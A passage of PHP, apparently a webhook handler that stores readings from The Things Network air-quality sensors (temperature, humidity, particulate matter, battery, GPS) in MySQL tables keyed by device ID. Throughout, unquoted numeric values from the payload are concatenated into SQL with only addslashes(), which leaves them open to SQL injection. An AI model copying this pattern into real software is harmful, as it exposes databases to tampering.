//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement170 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement171 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement172 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000001') {
logError('hittestress-0000000000000001: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement319 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement320 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement321 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement322 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement323 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement324 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode125 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=125';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000002':
if($data->dev_id == 'ttn_apld_dust_0000000000000002') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement61 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000002') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement173 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement174 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement175 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement176 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000002') {
logError('hittestress-0000000000000002: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement327 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement328 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement329 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement330 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement331 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement332 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode126 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=126';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000003':
if($data->dev_id == 'ttn_apld_dust_0000000000000003') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement62 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000003') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement177 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement178 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement179 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement180 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000003') {
logError('hittestress-0000000000000003: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement333 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement334 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement335 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement336 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement337 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement338 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode127 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=127';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000004':
if($data->dev_id == 'ttn_apld_dust_0000000000000004') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement63 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000004') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement181 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement182 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement183 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement184 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000004') {
logError('hittestress-0000000000000004: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement339 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement340 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement341 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement342 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement343 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement344 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode128 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=128';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000005':
if($data->dev_id == 'ttn_apld_dust_0000000000000005') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement64 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000005') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement185 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement186 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement187 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement188 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000005') {
logError('hittestress-0000000000000005: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement345 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement346 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement347 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement348 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement349 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement350 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode129 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=129';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000006':
if($data->dev_id == 'ttn_apld_dust_0000000000000006') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement65 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000006') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement189 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement190 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement191 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement192 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000006') {
logError('hittestress-0000000000000006: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement351 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement352 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement353 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement354 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement355 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement356 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode130 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=130';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000007':
if($data->dev_id == 'ttn_apld_dust_0000000000000007') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement66 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000007') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement193 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement194 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement195 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement196 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000007') {
logError('hittestress-0000000000000007: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement357 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement358 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement359 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement360 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement361 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement362 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode131 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=131';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000008':
if($data->dev_id == 'ttn_apld_dust_0000000000000008') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement67 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000008') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement197 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement198 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement199 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement200 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000008') {
logError('hittestress-0000000000000008: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement363 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement364 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement365 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement366 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement367 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement368 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode132 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=132';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000009':
if($data->dev_id == 'ttn_apld_dust_0000000000000009') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement68 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000009') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement201 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement202 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement203 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement204 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000009') {
logError('hittestress-0000000000000009: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement369 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement370 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement371 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement372 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement373 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement374 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode133 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=133';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000A':
if($data->dev_id == 'ttn_apld_dust_000000000000000a') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement69 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000a') {
logError('hittestress-000000000000000a: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement375 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement376 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement377 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
